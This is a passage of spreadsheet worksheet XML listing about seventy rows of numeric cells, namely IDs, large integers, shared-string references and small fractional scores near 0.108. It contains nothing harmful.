      <c r="A28954" s="1">
        <v>21193.0</v>
      </c>
      <c r="B28954" s="2">
        <v>1.9326769E7</v>
      </c>
      <c r="C28954" s="2" t="s">
        <v>27835</v>
      </c>
      <c r="D28954" s="2">
        <v>1.0</v>
      </c>
      <c r="E28954" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28954" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28955" ht="15.75" customHeight="1">
      <c r="A28955" s="1">
        <v>26906.0</v>
      </c>
      <c r="B28955" s="2">
        <v>1.9326768E7</v>
      </c>
      <c r="C28955" s="2" t="s">
        <v>27835</v>
      </c>
      <c r="D28955" s="2">
        <v>1.0</v>
      </c>
      <c r="E28955" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28955" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28956" ht="15.75" customHeight="1">
      <c r="A28956" s="1">
        <v>28955.0</v>
      </c>
      <c r="B28956" s="2">
        <v>2.9726531E7</v>
      </c>
      <c r="C28956" s="2" t="s">
        <v>27836</v>
      </c>
      <c r="D28956" s="2">
        <v>1.0</v>
      </c>
      <c r="E28956" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28956" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="28957" ht="15.75" customHeight="1">
      <c r="A28957" s="1">
        <v>768.0</v>
      </c>
      <c r="B28957" s="2">
        <v>2.1065915E7</v>
      </c>
      <c r="C28957" s="2" t="s">
        <v>27837</v>
      </c>
      <c r="D28957" s="2">
        <v>1.0</v>
      </c>
      <c r="E28957" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28957" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="28958" ht="15.75" customHeight="1">
      <c r="A28958" s="1">
        <v>2208.0</v>
      </c>
      <c r="B28958" s="2">
        <v>3.2073931E7</v>
      </c>
      <c r="C28958" s="2" t="s">
        <v>27838</v>
      </c>
      <c r="D28958" s="2">
        <v>1.0</v>
      </c>
      <c r="E28958" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28958" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="28959" ht="15.75" customHeight="1">
      <c r="A28959" s="1">
        <v>5245.0</v>
      </c>
      <c r="B28959" s="2">
        <v>4.5067059E7</v>
      </c>
      <c r="C28959" s="2" t="s">
        <v>27839</v>
      </c>
      <c r="D28959" s="2">
        <v>1.0</v>
      </c>
      <c r="E28959" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28959" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="28960" ht="15.75" customHeight="1">
      <c r="A28960" s="1">
        <v>28309.0</v>
      </c>
      <c r="B28960" s="2">
        <v>2.5678868E7</v>
      </c>
      <c r="C28960" s="2" t="s">
        <v>27840</v>
      </c>
      <c r="D28960" s="2">
        <v>1.0</v>
      </c>
      <c r="E28960" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28960" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="28961" ht="15.75" customHeight="1">
      <c r="A28961" s="1">
        <v>31619.0</v>
      </c>
      <c r="B28961" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C28961" s="2" t="s">
        <v>27841</v>
      </c>
      <c r="D28961" s="2">
        <v>1.0</v>
      </c>
      <c r="E28961" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28961" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="28962" ht="15.75" customHeight="1">
      <c r="A28962" s="1">
        <v>3821.0</v>
      </c>
      <c r="B28962" s="2">
        <v>4.0106011E7</v>
      </c>
      <c r="C28962" s="2" t="s">
        <v>27842</v>
      </c>
      <c r="D28962" s="2">
        <v>1.0</v>
      </c>
      <c r="E28962" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28962" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="28963" ht="15.75" customHeight="1">
      <c r="A28963" s="1">
        <v>27905.0</v>
      </c>
      <c r="B28963" s="2">
        <v>2.3692201E7</v>
      </c>
      <c r="C28963" s="2" t="s">
        <v>27843</v>
      </c>
      <c r="D28963" s="2">
        <v>1.0</v>
      </c>
      <c r="E28963" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28963" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="28964" ht="15.75" customHeight="1">
      <c r="A28964" s="1">
        <v>18353.0</v>
      </c>
      <c r="B28964" s="2">
        <v>5.2486624E7</v>
      </c>
      <c r="C28964" s="2" t="s">
        <v>27844</v>
      </c>
      <c r="D28964" s="2">
        <v>1.0</v>
      </c>
      <c r="E28964" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28964" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="28965" ht="15.75" customHeight="1">
      <c r="A28965" s="1">
        <v>19877.0</v>
      </c>
      <c r="B28965" s="2">
        <v>5.7249885E7</v>
      </c>
      <c r="C28965" s="2" t="s">
        <v>27845</v>
      </c>
      <c r="D28965" s="2">
        <v>1.0</v>
      </c>
      <c r="E28965" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28965" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="28966" ht="15.75" customHeight="1">
      <c r="A28966" s="1">
        <v>20116.0</v>
      </c>
      <c r="B28966" s="2">
        <v>4947870.0</v>
      </c>
      <c r="C28966" s="2" t="s">
        <v>27846</v>
      </c>
      <c r="D28966" s="2">
        <v>1.0</v>
      </c>
      <c r="E28966" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28966" s="2">
        <v>0.1084229390681003</v>
      </c>
    </row>
    <row r="28967" ht="15.75" customHeight="1">
      <c r="A28967" s="1">
        <v>26547.0</v>
      </c>
      <c r="B28967" s="2">
        <v>1.775884E7</v>
      </c>
      <c r="C28967" s="2" t="s">
        <v>27847</v>
      </c>
      <c r="D28967" s="2">
        <v>1.0</v>
      </c>
      <c r="E28967" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28967" s="2">
        <v>0.1084229390681003</v>
      </c>
    </row>
    <row r="28968" ht="15.75" customHeight="1">
      <c r="A28968" s="1">
        <v>7269.0</v>
      </c>
      <c r="B28968" s="2">
        <v>5.0774544E7</v>
      </c>
      <c r="C28968" s="2" t="s">
        <v>27848</v>
      </c>
      <c r="D28968" s="2">
        <v>1.0</v>
      </c>
      <c r="E28968" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28968" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="28969" ht="15.75" customHeight="1">
      <c r="A28969" s="1">
        <v>22640.0</v>
      </c>
      <c r="B28969" s="2">
        <v>4.0646436E7</v>
      </c>
      <c r="C28969" s="2" t="s">
        <v>27849</v>
      </c>
      <c r="D28969" s="2">
        <v>1.0</v>
      </c>
      <c r="E28969" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28969" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="28970" ht="15.75" customHeight="1">
      <c r="A28970" s="1">
        <v>1903.0</v>
      </c>
      <c r="B28970" s="2">
        <v>2.999443E7</v>
      </c>
      <c r="C28970" s="2" t="s">
        <v>27850</v>
      </c>
      <c r="D28970" s="2">
        <v>1.0</v>
      </c>
      <c r="E28970" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28970" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="28971" ht="15.75" customHeight="1">
      <c r="A28971" s="1">
        <v>12956.0</v>
      </c>
      <c r="B28971" s="2">
        <v>3.243189E7</v>
      </c>
      <c r="C28971" s="2" t="s">
        <v>27851</v>
      </c>
      <c r="D28971" s="2">
        <v>1.0</v>
      </c>
      <c r="E28971" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28971" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="28972" ht="15.75" customHeight="1">
      <c r="A28972" s="1">
        <v>19646.0</v>
      </c>
      <c r="B28972" s="2">
        <v>5.6298971E7</v>
      </c>
      <c r="C28972" s="2" t="s">
        <v>27852</v>
      </c>
      <c r="D28972" s="2">
        <v>1.0</v>
      </c>
      <c r="E28972" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28972" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="28973" ht="15.75" customHeight="1">
      <c r="A28973" s="1">
        <v>13981.0</v>
      </c>
      <c r="B28973" s="2">
        <v>3.7345123E7</v>
      </c>
      <c r="C28973" s="2" t="s">
        <v>20645</v>
      </c>
      <c r="D28973" s="2">
        <v>1.0</v>
      </c>
      <c r="E28973" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28973" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="28974" ht="15.75" customHeight="1">
      <c r="A28974" s="1">
        <v>15224.0</v>
      </c>
      <c r="B28974" s="2">
        <v>4.2180887E7</v>
      </c>
      <c r="C28974" s="2" t="s">
        <v>27853</v>
      </c>
      <c r="D28974" s="2">
        <v>1.0</v>
      </c>
      <c r="E28974" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28974" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="28975" ht="15.75" customHeight="1">
      <c r="A28975" s="1">
        <v>16162.0</v>
      </c>
      <c r="B28975" s="2">
        <v>4.5613635E7</v>
      </c>
      <c r="C28975" s="2" t="s">
        <v>27854</v>
      </c>
      <c r="D28975" s="2">
        <v>1.0</v>
      </c>
      <c r="E28975" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28975" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="28976" ht="15.75" customHeight="1">
      <c r="A28976" s="1">
        <v>21998.0</v>
      </c>
      <c r="B28976" s="2">
        <v>2.9573742E7</v>
      </c>
      <c r="C28976" s="2" t="s">
        <v>27855</v>
      </c>
      <c r="D28976" s="2">
        <v>1.0</v>
      </c>
      <c r="E28976" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28976" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="28977" ht="15.75" customHeight="1">
      <c r="A28977" s="1">
        <v>22062.0</v>
      </c>
      <c r="B28977" s="2">
        <v>3.0526361E7</v>
      </c>
      <c r="C28977" s="2" t="s">
        <v>17824</v>
      </c>
      <c r="D28977" s="2">
        <v>1.0</v>
      </c>
      <c r="E28977" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28977" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="28978" ht="15.75" customHeight="1">
      <c r="A28978" s="1">
        <v>24740.0</v>
      </c>
      <c r="B28978" s="2">
        <v>1.1790629E7</v>
      </c>
      <c r="C28978" s="2" t="s">
        <v>27856</v>
      </c>
      <c r="D28978" s="2">
        <v>1.0</v>
      </c>
      <c r="E28978" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28978" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="28979" ht="15.75" customHeight="1">
      <c r="A28979" s="1">
        <v>25298.0</v>
      </c>
      <c r="B28979" s="2">
        <v>1.3410769E7</v>
      </c>
      <c r="C28979" s="2" t="s">
        <v>27857</v>
      </c>
      <c r="D28979" s="2">
        <v>1.0</v>
      </c>
      <c r="E28979" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28979" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="28980" ht="15.75" customHeight="1">
      <c r="A28980" s="1">
        <v>3059.0</v>
      </c>
      <c r="B28980" s="2">
        <v>3.6506302E7</v>
      </c>
      <c r="C28980" s="2" t="s">
        <v>27858</v>
      </c>
      <c r="D28980" s="2">
        <v>1.0</v>
      </c>
      <c r="E28980" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28980" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28981" ht="15.75" customHeight="1">
      <c r="A28981" s="1">
        <v>4089.0</v>
      </c>
      <c r="B28981" s="2">
        <v>4.1227473E7</v>
      </c>
      <c r="C28981" s="2" t="s">
        <v>27859</v>
      </c>
      <c r="D28981" s="2">
        <v>1.0</v>
      </c>
      <c r="E28981" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28981" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28982" ht="15.75" customHeight="1">
      <c r="A28982" s="1">
        <v>5951.0</v>
      </c>
      <c r="B28982" s="2">
        <v>4.7285679E7</v>
      </c>
      <c r="C28982" s="2" t="s">
        <v>27860</v>
      </c>
      <c r="D28982" s="2">
        <v>1.0</v>
      </c>
      <c r="E28982" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28982" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28983" ht="15.75" customHeight="1">
      <c r="A28983" s="1">
        <v>6994.0</v>
      </c>
      <c r="B28983" s="2">
        <v>5.0077526E7</v>
      </c>
      <c r="C28983" s="2" t="s">
        <v>27861</v>
      </c>
      <c r="D28983" s="2">
        <v>1.0</v>
      </c>
      <c r="E28983" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28983" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28984" ht="15.75" customHeight="1">
      <c r="A28984" s="1">
        <v>8310.0</v>
      </c>
      <c r="B28984" s="2">
        <v>5.3604959E7</v>
      </c>
      <c r="C28984" s="2" t="s">
        <v>27862</v>
      </c>
      <c r="D28984" s="2">
        <v>1.0</v>
      </c>
      <c r="E28984" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28984" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28985" ht="15.75" customHeight="1">
      <c r="A28985" s="1">
        <v>8704.0</v>
      </c>
      <c r="B28985" s="2">
        <v>5.4449612E7</v>
      </c>
      <c r="C28985" s="2" t="s">
        <v>27863</v>
      </c>
      <c r="D28985" s="2">
        <v>1.0</v>
      </c>
      <c r="E28985" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28985" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28986" ht="15.75" customHeight="1">
      <c r="A28986" s="1">
        <v>9270.0</v>
      </c>
      <c r="B28986" s="2">
        <v>5.5499871E7</v>
      </c>
      <c r="C28986" s="2" t="s">
        <v>27864</v>
      </c>
      <c r="D28986" s="2">
        <v>1.0</v>
      </c>
      <c r="E28986" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28986" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28987" ht="15.75" customHeight="1">
      <c r="A28987" s="1">
        <v>11709.0</v>
      </c>
      <c r="B28987" s="2">
        <v>2.3590625E7</v>
      </c>
      <c r="C28987" s="2" t="s">
        <v>27865</v>
      </c>
      <c r="D28987" s="2">
        <v>1.0</v>
      </c>
      <c r="E28987" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28987" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28988" ht="15.75" customHeight="1">
      <c r="A28988" s="1">
        <v>13749.0</v>
      </c>
      <c r="B28988" s="2">
        <v>3.6484364E7</v>
      </c>
      <c r="C28988" s="2" t="s">
        <v>27866</v>
      </c>
      <c r="D28988" s="2">
        <v>1.0</v>
      </c>
      <c r="E28988" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28988" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28989" ht="15.75" customHeight="1">
      <c r="A28989" s="1">
        <v>14314.0</v>
      </c>
      <c r="B28989" s="2">
        <v>3.8672556E7</v>
      </c>
      <c r="C28989" s="2" t="s">
        <v>27867</v>
      </c>
      <c r="D28989" s="2">
        <v>1.0</v>
      </c>
      <c r="E28989" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28989" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28990" ht="15.75" customHeight="1">
      <c r="A28990" s="1">
        <v>14582.0</v>
      </c>
      <c r="B28990" s="2">
        <v>4.0129302E7</v>
      </c>
      <c r="C28990" s="2" t="s">
        <v>27868</v>
      </c>
      <c r="D28990" s="2">
        <v>1.0</v>
      </c>
      <c r="E28990" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28990" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28991" ht="15.75" customHeight="1">
      <c r="A28991" s="1">
        <v>14866.0</v>
      </c>
      <c r="B28991" s="2">
        <v>4.1076033E7</v>
      </c>
      <c r="C28991" s="2" t="s">
        <v>27869</v>
      </c>
      <c r="D28991" s="2">
        <v>1.0</v>
      </c>
      <c r="E28991" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28991" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28992" ht="15.75" customHeight="1">
      <c r="A28992" s="1">
        <v>15375.0</v>
      </c>
      <c r="B28992" s="2">
        <v>4.275245E7</v>
      </c>
      <c r="C28992" s="2" t="s">
        <v>27870</v>
      </c>
      <c r="D28992" s="2">
        <v>1.0</v>
      </c>
      <c r="E28992" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28992" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28993" ht="15.75" customHeight="1">
      <c r="A28993" s="1">
        <v>15671.0</v>
      </c>
      <c r="B28993" s="2">
        <v>4.3781124E7</v>
      </c>
      <c r="C28993" s="2" t="s">
        <v>27871</v>
      </c>
      <c r="D28993" s="2">
        <v>1.0</v>
      </c>
      <c r="E28993" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28993" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28994" ht="15.75" customHeight="1">
      <c r="A28994" s="1">
        <v>15820.0</v>
      </c>
      <c r="B28994" s="2">
        <v>4.4267395E7</v>
      </c>
      <c r="C28994" s="2" t="s">
        <v>27872</v>
      </c>
      <c r="D28994" s="2">
        <v>1.0</v>
      </c>
      <c r="E28994" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28994" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28995" ht="15.75" customHeight="1">
      <c r="A28995" s="1">
        <v>16703.0</v>
      </c>
      <c r="B28995" s="2">
        <v>4.7403979E7</v>
      </c>
      <c r="C28995" s="2" t="s">
        <v>27873</v>
      </c>
      <c r="D28995" s="2">
        <v>1.0</v>
      </c>
      <c r="E28995" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28995" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28996" ht="15.75" customHeight="1">
      <c r="A28996" s="1">
        <v>18258.0</v>
      </c>
      <c r="B28996" s="2">
        <v>5.2188236E7</v>
      </c>
      <c r="C28996" s="2" t="s">
        <v>27874</v>
      </c>
      <c r="D28996" s="2">
        <v>1.0</v>
      </c>
      <c r="E28996" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28996" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28997" ht="15.75" customHeight="1">
      <c r="A28997" s="1">
        <v>18286.0</v>
      </c>
      <c r="B28997" s="2">
        <v>5.2270065E7</v>
      </c>
      <c r="C28997" s="2" t="s">
        <v>27875</v>
      </c>
      <c r="D28997" s="2">
        <v>1.0</v>
      </c>
      <c r="E28997" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28997" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28998" ht="15.75" customHeight="1">
      <c r="A28998" s="1">
        <v>18807.0</v>
      </c>
      <c r="B28998" s="2">
        <v>5.3888496E7</v>
      </c>
      <c r="C28998" s="2" t="s">
        <v>27876</v>
      </c>
      <c r="D28998" s="2">
        <v>1.0</v>
      </c>
      <c r="E28998" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28998" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="28999" ht="15.75" customHeight="1">
      <c r="A28999" s="1">
        <v>20452.0</v>
      </c>
      <c r="B28999" s="2">
        <v>1.2514261E7</v>
      </c>
      <c r="C28999" s="2" t="s">
        <v>27877</v>
      </c>
      <c r="D28999" s="2">
        <v>1.0</v>
      </c>
      <c r="E28999" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28999" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29000" ht="15.75" customHeight="1">
      <c r="A29000" s="1">
        <v>20472.0</v>
      </c>
      <c r="B29000" s="2">
        <v>1.2796845E7</v>
      </c>
      <c r="C29000" s="2" t="s">
        <v>27878</v>
      </c>
      <c r="D29000" s="2">
        <v>1.0</v>
      </c>
      <c r="E29000" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29000" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29001" ht="15.75" customHeight="1">
      <c r="A29001" s="1">
        <v>20783.0</v>
      </c>
      <c r="B29001" s="2">
        <v>1.5064717E7</v>
      </c>
      <c r="C29001" s="2" t="s">
        <v>27879</v>
      </c>
      <c r="D29001" s="2">
        <v>1.0</v>
      </c>
      <c r="E29001" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29001" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29002" ht="15.75" customHeight="1">
      <c r="A29002" s="1">
        <v>23186.0</v>
      </c>
      <c r="B29002" s="2">
        <v>5233121.0</v>
      </c>
      <c r="C29002" s="2" t="s">
        <v>27880</v>
      </c>
      <c r="D29002" s="2">
        <v>1.0</v>
      </c>
      <c r="E29002" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29002" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29003" ht="15.75" customHeight="1">
      <c r="A29003" s="1">
        <v>24197.0</v>
      </c>
      <c r="B29003" s="2">
        <v>1.0300738E7</v>
      </c>
      <c r="C29003" s="2" t="s">
        <v>27746</v>
      </c>
      <c r="D29003" s="2">
        <v>1.0</v>
      </c>
      <c r="E29003" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29003" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29004" ht="15.75" customHeight="1">
      <c r="A29004" s="1">
        <v>24401.0</v>
      </c>
      <c r="B29004" s="2">
        <v>1.080961E7</v>
      </c>
      <c r="C29004" s="2" t="s">
        <v>27881</v>
      </c>
      <c r="D29004" s="2">
        <v>1.0</v>
      </c>
      <c r="E29004" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29004" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29005" ht="15.75" customHeight="1">
      <c r="A29005" s="1">
        <v>25484.0</v>
      </c>
      <c r="B29005" s="2">
        <v>1.4028153E7</v>
      </c>
      <c r="C29005" s="2" t="s">
        <v>27882</v>
      </c>
      <c r="D29005" s="2">
        <v>1.0</v>
      </c>
      <c r="E29005" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29005" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29006" ht="15.75" customHeight="1">
      <c r="A29006" s="1">
        <v>25730.0</v>
      </c>
      <c r="B29006" s="2">
        <v>1.4552933E7</v>
      </c>
      <c r="C29006" s="2" t="s">
        <v>27883</v>
      </c>
      <c r="D29006" s="2">
        <v>1.0</v>
      </c>
      <c r="E29006" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29006" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29007" ht="15.75" customHeight="1">
      <c r="A29007" s="1">
        <v>26013.0</v>
      </c>
      <c r="B29007" s="2">
        <v>1.5349534E7</v>
      </c>
      <c r="C29007" s="2" t="s">
        <v>27884</v>
      </c>
      <c r="D29007" s="2">
        <v>1.0</v>
      </c>
      <c r="E29007" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29007" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29008" ht="15.75" customHeight="1">
      <c r="A29008" s="1">
        <v>26399.0</v>
      </c>
      <c r="B29008" s="2">
        <v>1.7021412E7</v>
      </c>
      <c r="C29008" s="2" t="s">
        <v>27885</v>
      </c>
      <c r="D29008" s="2">
        <v>1.0</v>
      </c>
      <c r="E29008" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29008" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29009" ht="15.75" customHeight="1">
      <c r="A29009" s="1">
        <v>28177.0</v>
      </c>
      <c r="B29009" s="2">
        <v>2.4991644E7</v>
      </c>
      <c r="C29009" s="2" t="s">
        <v>27886</v>
      </c>
      <c r="D29009" s="2">
        <v>1.0</v>
      </c>
      <c r="E29009" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29009" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29010" ht="15.75" customHeight="1">
      <c r="A29010" s="1">
        <v>29099.0</v>
      </c>
      <c r="B29010" s="2">
        <v>3.0392416E7</v>
      </c>
      <c r="C29010" s="2" t="s">
        <v>27887</v>
      </c>
      <c r="D29010" s="2">
        <v>1.0</v>
      </c>
      <c r="E29010" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29010" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29011" ht="15.75" customHeight="1">
      <c r="A29011" s="1">
        <v>30026.0</v>
      </c>
      <c r="B29011" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C29011" s="2" t="s">
        <v>27888</v>
      </c>
      <c r="D29011" s="2">
        <v>1.0</v>
      </c>
      <c r="E29011" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29011" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29012" ht="15.75" customHeight="1">
      <c r="A29012" s="1">
        <v>30480.0</v>
      </c>
      <c r="B29012" s="2">
        <v>3.9755198E7</v>
      </c>
      <c r="C29012" s="2" t="s">
        <v>27889</v>
      </c>
      <c r="D29012" s="2">
        <v>1.0</v>
      </c>
      <c r="E29012" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29012" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29013" ht="15.75" customHeight="1">
      <c r="A29013" s="1">
        <v>31070.0</v>
      </c>
      <c r="B29013" s="2">
        <v>4.8222688E7</v>
      </c>
      <c r="C29013" s="2" t="s">
        <v>27890</v>
      </c>
      <c r="D29013" s="2">
        <v>1.0</v>
      </c>
      <c r="E29013" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29013" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29014" ht="15.75" customHeight="1">
      <c r="A29014" s="1">
        <v>31322.0</v>
      </c>
      <c r="B29014" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C29014" s="2" t="s">
        <v>27891</v>
      </c>
      <c r="D29014" s="2">
        <v>1.0</v>
      </c>
      <c r="E29014" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29014" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29015" ht="15.75" customHeight="1">
      <c r="A29015" s="1">
        <v>32730.0</v>
      </c>
      <c r="B29015" s="2">
        <v>6011107.0</v>
      </c>
      <c r="C29015" s="2" t="s">
        <v>27892</v>
      </c>
      <c r="D29015" s="2">
        <v>1.0</v>
      </c>
      <c r="E29015" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29015" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="29016" ht="15.75" customHeight="1">
      <c r="A29016" s="1">
        <v>13302.0</v>
      </c>
      <c r="B29016" s="2">
        <v>3.4497639E7</v>
      </c>
      <c r="C29016" s="2" t="s">
        <v>27893</v>
      </c>
      <c r="D29016" s="2">
        <v>1.0</v>
      </c>
      <c r="E29016" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29016" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="29017" ht="15.75" customHeight="1">
      <c r="A29017" s="1">
        <v>2910.0</v>
      </c>
      <c r="B29017" s="2">
        <v>3.5822094E7</v>
      </c>
      <c r="C29017" s="2" t="s">
        <v>27894</v>
      </c>
      <c r="D29017" s="2">
        <v>1.0</v>
      </c>
      <c r="E29017" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29017" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29018" ht="15.75" customHeight="1">
      <c r="A29018" s="1">
        <v>3323.0</v>
      </c>
      <c r="B29018" s="2">
        <v>3.7666719E7</v>
      </c>
      <c r="C29018" s="2" t="s">
        <v>27895</v>
      </c>
      <c r="D29018" s="2">
        <v>1.0</v>
      </c>
      <c r="E29018" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29018" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29019" ht="15.75" customHeight="1">
      <c r="A29019" s="1">
        <v>3550.0</v>
      </c>
      <c r="B29019" s="2">
        <v>3.8777429E7</v>
      </c>
      <c r="C29019" s="2" t="s">
        <v>27896</v>
      </c>
      <c r="D29019" s="2">
        <v>1.0</v>
      </c>
      <c r="E29019" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29019" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29020" ht="15.75" customHeight="1">
      <c r="A29020" s="1">
        <v>4433.0</v>
      </c>
      <c r="B29020" s="2">
        <v>4.2351597E7</v>
      </c>
      <c r="C29020" s="2" t="s">
        <v>27897</v>
      </c>
      <c r="D29020" s="2">
        <v>1.0</v>
      </c>
      <c r="E29020" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29020" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="29021" ht="15.75" customHeight="1">
      <c r="A29021" s="1">
        <v>7341.0</v>
      </c>
      <c r="B29021" s="2">
